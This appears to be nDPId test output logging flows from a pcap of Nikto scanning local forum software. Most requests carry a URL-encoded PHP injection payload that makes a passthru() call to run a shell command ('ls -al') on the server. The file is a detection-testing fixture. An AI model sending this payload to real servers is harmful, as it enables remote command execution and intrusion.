{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_packet_id":1,"flow_last_seen":1576420277813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277813,"pkt":"AAAAAAAAAAAAAAAACABFAAFt2OpAAEAGYp5\/AAABfwAAAccGH5BS6uHGYiCIs4AYAED\/YQAAAQEICp1m\/12dZv9dR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01228{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_packet_id":1,"flow_last_seen":1576420277814,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277814,"pkt":"AAAAAAAAAAAAAAAACABFAAFt1fZAAEAGZZJ\/AAABfwAAAccIH5Bl1OzaDJYmQ4AYAED\/YQAAAQEICp1m\/16dZv9eR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01228{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":1,"flow_last_seen":1576420277816,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277816,"pkt":"AAAAAAAAAAAAAAAACABFAAFmyD5AAEAGc1F\/AAABfwAAAccKH5CvpPET10Ucz4AYAED\/WgAAAQEICp1m\/2CdZv9gR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01220{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_packet_id":1,"flow_last_seen":1576420277817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277817,"pkt":"AAAAAAAAAAAAAAAACABFAAFvTQNAAEAG7oN\/AAABfwAAAccMH5C7inQwMMPyYoAYAED\/YwAAAQEICp1m\/2GdZv9hR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_packet_id":1,"flow_last_seen":1576420277819,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277819,"pkt":"AAAAAAAAAAAAAAAACABFAAF0lOFAAEAGpqB\/AAABfwAAAccOH5D5PK3yk85ZF4AYAED\/aAAAAQEICp1m\/2KdZv9iR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01236{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_packet_id":1,"flow_last_seen":1576420277821,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277821,"pkt":"AAAAAAAAAAAAAAAACABFAAFu9rlAAEAGRM5\/AAABfwAAAccQH5BepM+ZKyRDwoAYAED\/YgAAAQEICp1m\/2WdZv9lR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01229{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_packet_id":1,"flow_last_seen":1576420277822,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277822,"pkt":"AAAAAAAAAAAAAAAACABFAAFs7qZAAEAGTON\/AAABfwAAAccSH5AvkdeM6hywhIAYAED\/YAAAAQEICp1m\/2adZv9mR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01227{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_packet_id":1,"flow_last_seen":1576420277824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277824,"pkt":"AAAAAAAAAAAAAAAACABFAAFsidNAAEAGsbZ\/AAABfwAAAccUH5D2t7Di3ewIxYAYAED\/YAAAAQEICp1m\/2idZv9oR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCg0K"}
01227{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_packet_id":1,"flow_last_seen":1576420277827,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277827,"pkt":"AAAAAAAAAAAAAAAACABFAAFnzSRAAEAGbmp\/AAABfwAAAccWH5CSlfQTmmOJAIAYAED\/WwAAAQEICp1m\/2qdZv9qR0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="}
